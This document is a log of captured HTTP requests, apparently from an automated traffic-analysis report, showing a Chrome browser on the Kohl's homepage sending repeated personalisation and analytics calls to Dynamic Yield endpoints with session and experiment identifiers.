Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=504757&uid=5152118215960316765&sec=8776374&t=ri&e=1127582&p=1&ve=10281141&va=%5B26223332%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281501450898&cgtgDecisionId=6223531283525623267&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765454&rri=2056457 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /spa/json?sec=8776374&id=5152118215960316765&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&jsession=485f45289856e801061ea1736ab89d6f&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D HTTP/1.1Host: st.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain; charset=utf-8Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=142489&uid=5152118215960316765&sec=8776374&t=ri&e=1179251&p=1&ve=11202288&va=%5B26647761%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531283486598196&cgtgDecisionId=6223531284450028582&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765456&rri=8413099 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=441024&uid=5152118215960316765&sec=8776374&t=ri&e=1185440&p=1&ve=11002655&va=%5B27022616%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285337344252&cgtgDecisionId=6223531283899017054&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765458&rri=8757921 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=357547&uid=5152118215960316765&sec=8776374&t=ri&e=1289933&p=1&ve=11374557&va=%5B27236876%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531284342582131&cgtgDecisionId=6223531283855978855&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765460&rri=4823724 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dpx?cnst=1&_=409229&name=User%20Session&props=undefined&uid=5152118215960316765&sec=8776374&cl=dk.w.c.ms.fst.&ses=6422c8f0bb98e603976788b91eb4c9f9&l=def&p=1&sd=&rf=rpbr.ithbetoxi.com&trf=0&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139&url=https%3A%2F%2Fwww.kohls.com%2F&exps=%5B%5B%221067036%22%2C%229863190%22%2C%2225792075%22%2C0%2Cnull%2Cnull%2C%226223531284971217697%22%2C%222%22%2C%223%22%2C%226223531283276526106%22%5D%2C%5B%221096558%22%2C%2213270084%22%2C%2226047526%22%2C0%2Cnull%2Cnull%2C%226223531285028552266%22%2C%221%22%2Cnull%2C%226223531282218381299%22%5D%2C%5B%221127311%22%2C%2210280236%22%2C%2226221758%22%2C0%2Cnull%2Cnull%2C%226223531281688516575%22%2C%221%22%2Cnull%2C%226223531284435784473%22%5D%2C%5B%221127582%22%2C%2210281141%22%2C%2226223332%22%2C0%2Cnull%2Cnull%2C%226223531281501450898%22%2C%221%22%2Cnull%2C%226223531283525623267%22%5D%2C%5B%221179251%22%2C%2211202288%22%2C%2226647761%22%2C0%2Cnull%2Cnull%2C%226223531283486598196%22%2C%221%22%2Cnull%2C%226223531284450028582%22%5D%2C%5B%221185440%22%2C%2211002655%22%2C%2227022616%22%2C0%2Cnull%2Cnull%2C%226223531285337344252%22%2C%221%22%2Cnull%2C%226223531283899017054%22%5D%2C%5B%221289933%22%2C%2211374557%22%2C%2227236876%22%2C0%2Cnull%2Cnull%2C%226223531284342582131%22%2C%221%22%2Cnull%2C%226223531283855978855%22%5D%2C%5B%221309946%22%2C%2211951163%22%2C%2227308034%22%2C0%2Cnull%2Cnull%2C%226223531285093722672%22%2C%221%22%2Cnull%2C%226223531284983802992%22%5D%2C%5B%221343143%22%2C%2211836075%22%2C%2227429945%22%2C0%2Cnull%2Cnull%2C%226223531282356931978%22%2C%221%22%2Cnull%2C%226223531285009424051%22%5D%2C%5B%221364209%22%2C%2211678654%22%2C%2227506569%22%2C0%2Cnull%2Cnull%2C%226223531285013511387%22%2C%221%22%2Cnull%2C%226223531283753054186%22%5D%2C%5B%221430321%22%2C%2213039857%22%2C%2227737517%22%2C0%2Cnull%2Cnull%2C%226223531283553389137%22%2C%221%22%2Cnull%2C%226223531281455859128%22%5D%2C%5B%221494574%22%2C%2212255008%22%2C%2227939630%22%2C0%2Cnull%2Cnull%2C%226223531281929211350%22%2C%221%22%2Cnull%2C%226223531282553591841%22%5D%2C%5B%221499924%22%2C%2212255037%22%2C%2227954911%22%2C0%2Cnull%2Cnull%2C%226223531281611242527%22%2C%221%22%2Cnull%2C%226223531282400351928%22%5D%2C%5B%221654163%22%2C%2212837615%22%2C%2228481328%22%2C0%2Cnull%2Cnull%2C%226223531282440805148%22%2C%221%22%2Cnull%2C%226223531285467312969%22%5D%2C%5B%221717934%22%2C%2213127279%22%2C%2228707585%22%2C0%2Cnull%2Cnull%2C%226223531282585698845%22%2C%221%22%2Cnull%2C%226223531281764759573%22%5D%2C%5B%221718774%22%2C%2213127278%22%2C%2228710098%22%2C0%2Cnull%2Cnull%2C%226223531282278432871%22%2C%221%22%2Cnull%2C%226223531281411508625%22%5D%2C%5B%221800633%22%2C%2213331508%22%2C%2229002357%22%2C0%2Cnull%2Cnull%2C%226223531282345478973%22%2C%221%22%2Cnull%2C%226223531285464528637%22%5D%2C%5B%221850311%22%2C%2213485570%22%2C%2229152080%22%2C0%2Cnull%2Cnull%2C%226223531281209263875%22%2C%221%22%2Cnull%2C%226223531282350819874%22%5D%5D&expSes
Source: global traffic	HTTP traffic detected: GET /dpx?cnst=1&_=526553&name=User%20Type&props=%7B%22type%22%3A%22new%22%7D&uid=5152118215960316765&sec=8776374&cl=dk.w.c.ms.fst.&ses=6422c8f0bb98e603976788b91eb4c9f9&l=def&p=1&sd=&rf=rpbr.ithbetoxi.com&trf=0&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&url=https%3A%2F%2Fwww.kohls.com%2F&exps=%5B%5B%221067036%22%2C%229863190%22%2C%2225792075%22%2C0%2Cnull%2Cnull%2C%226223531284971217697%22%2C%222%22%2C%223%22%2C%226223531283276526106%22%5D%2C%5B%221096558%22%2C%2213270084%22%2C%2226047526%22%2C0%2Cnull%2Cnull%2C%226223531285028552266%22%2C%221%22%2Cnull%2C%226223531282218381299%22%5D%2C%5B%221127311%22%2C%2210280236%22%2C%2226221758%22%2C0%2Cnull%2Cnull%2C%226223531281688516575%22%2C%221%22%2Cnull%2C%226223531284435784473%22%5D%2C%5B%221127582%22%2C%2210281141%22%2C%2226223332%22%2C0%2Cnull%2Cnull%2C%226223531281501450898%22%2C%221%22%2Cnull%2C%226223531283525623267%22%5D%2C%5B%221179251%22%2C%2211202288%22%2C%2226647761%22%2C0%2Cnull%2Cnull%2C%226223531283486598196%22%2C%221%22%2Cnull%2C%226223531284450028582%22%5D%2C%5B%221185440%22%2C%2211002655%22%2C%2227022616%22%2C0%2Cnull%2Cnull%2C%226223531285337344252%22%2C%221%22%2Cnull%2C%226223531283899017054%22%5D%2C%5B%221289933%22%2C%2211374557%22%2C%2227236876%22%2C0%2Cnull%2Cnull%2C%226223531284342582131%22%2C%221%22%2Cnull%2C%226223531283855978855%22%5D%2C%5B%221309946%22%2C%2211951163%22%2C%2227308034%22%2C0%2Cnull%2Cnull%2C%226223531285093722672%22%2C%221%22%2Cnull%2C%226223531284983802992%22%5D%2C%5B%221343143%22%2C%2211836075%22%2C%2227429945%22%2C0%2Cnull%2Cnull%2C%226223531282356931978%22%2C%221%22%2Cnull%2C%226223531285009424051%22%5D%2C%5B%221364209%22%2C%2211678654%22%2C%2227506569%22%2C0%2Cnull%2Cnull%2C%226223531285013511387%22%2C%221%22%2Cnull%2C%226223531283753054186%22%5D%2C%5B%221430321%22%2C%2213039857%22%2C%2227737517%22%2C0%2Cnull%2Cnull%2C%226223531283553389137%22%2C%221%22%2Cnull%2C%226223531281455859128%22%5D%2C%5B%221494574%22%2C%2212255008%22%2C%2227939630%22%2C0%2Cnull%2Cnull%2C%226223531281929211350%22%2C%221%22%2Cnull%2C%226223531282553591841%22%5D%2C%5B%221499924%22%2C%2212255037%22%2C%2227954911%22%2C0%2Cnull%2Cnull%2C%226223531281611242527%22%2C%221%22%2Cnull%2C%226223531282400351928%22%5D%2C%5B%221654163%22%2C%2212837615%22%2C%2228481328%22%2C0%2Cnull%2Cnull%2C%226223531282440805148%22%2C%221%22%2Cnull%2C%226223531285467312969%22%5D%2C%5B%221717934%22%2C%2213127279%22%2C%2228707585%22%2C0%2Cnull%2Cnull%2C%226223531282585698845%22%2C%221%22%2Cnull%2C%226223531281764759573%22%5D%2C%5B%221718774%22%2C%2213127278%22%2C%2228710098%22%2C0%2Cnull%2Cnull%2C%226223531282278432871%22%2C%221%22%2Cnull%2C%226223531281411508625%22%5D%2C%5B%221800633%22%2C%2213331508%22%2C%2229002357%22%2C0%2Cnull%2Cnull%2C%226223531282345478973%22%2C%221%22%2Cnull%2C%226223531285464528637%22%5D%2C%5B%221850311%22%2C%2213485570%22%2C%2229152080%22%2C0%2Cnull%2Cnull%2C%226223531281209263875%22%2C%221%22%2Cnull%2C%2262235312823
Source: global traffic	HTTP traffic detected: GET /uia?cnst=1&_=1730300766422 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=41665&uid=5152118215960316765&sec=8776374&t=ri&e=1096558&p=1&ve=13270084&va=%5B26047526%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285028552266&cgtgDecisionId=6223531282218381299&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765451&rri=4350736 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=451444&uid=5152118215960316765&sec=8776374&t=ri&e=1127311&p=1&ve=10280236&va=%5B26221758%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281688516575&cgtgDecisionId=6223531284435784473&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765453&rri=5728072 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=571222&uid=5152118215960316765&sec=8776374&t=ri&e=1309946&p=1&ve=11951163&va=%5B27308034%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285093722672&cgtgDecisionId=6223531284983802992&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765461&rri=5613828 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=329350&uid=5152118215960316765&sec=8776374&t=ri&e=1343143&p=1&ve=11836075&va=%5B27429945%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282356931978&cgtgDecisionId=6223531285009424051&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765463&rri=3022219 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=695376&uid=5152118215960316765&sec=8776374&t=ri&e=1364209&p=1&ve=11678654&va=%5B27506569%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285013511387&cgtgDecisionId=6223531283753054186&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765465&rri=5583880 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=504757&uid=5152118215960316765&sec=8776374&t=ri&e=1127582&p=1&ve=10281141&va=%5B26223332%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281501450898&cgtgDecisionId=6223531283525623267&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765454&rri=2056457 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=850126&uid=5152118215960316765&sec=8776374&t=ri&e=1430321&p=1&ve=13039857&va=%5B27737517%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531283553389137&cgtgDecisionId=6223531281455859128&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765466&rri=6335366 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=128850&uid=5152118215960316765&sec=8776374&t=ri&e=1494574&p=1&ve=12255008&va=%5B27939630%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281929211350&cgtgDecisionId=6223531282553591841&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765467&rri=4460154 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=352893&uid=5152118215960316765&sec=8776374&t=ri&e=1499924&p=1&ve=12255037&va=%5B27954911%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281611242527&cgtgDecisionId=6223531282400351928&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765469&rri=4314070 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=738572&uid=5152118215960316765&sec=8776374&t=ri&e=1654163&p=1&ve=12837615&va=%5B28481328%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282440805148&cgtgDecisionId=6223531285467312969&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765471&rri=1178035 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=208047&uid=5152118215960316765&sec=8776374&t=ri&e=1717934&p=1&ve=13127279&va=%5B28707585%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531282585698845&cgtgDecisionId=6223531281764759573&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765472&rri=9086214 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f"
Source: global traffic	HTTP traffic detected: GET /spa/json?sec=8776374&id=5152118215960316765&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&jsession=485f45289856e801061ea1736ab89d6f&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D HTTP/1.1Host: st.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain; charset=utf-8Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=142489&uid=5152118215960316765&sec=8776374&t=ri&e=1179251&p=1&ve=11202288&va=%5B26647761%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531283486598196&cgtgDecisionId=6223531284450028582&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765456&rri=8413099 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
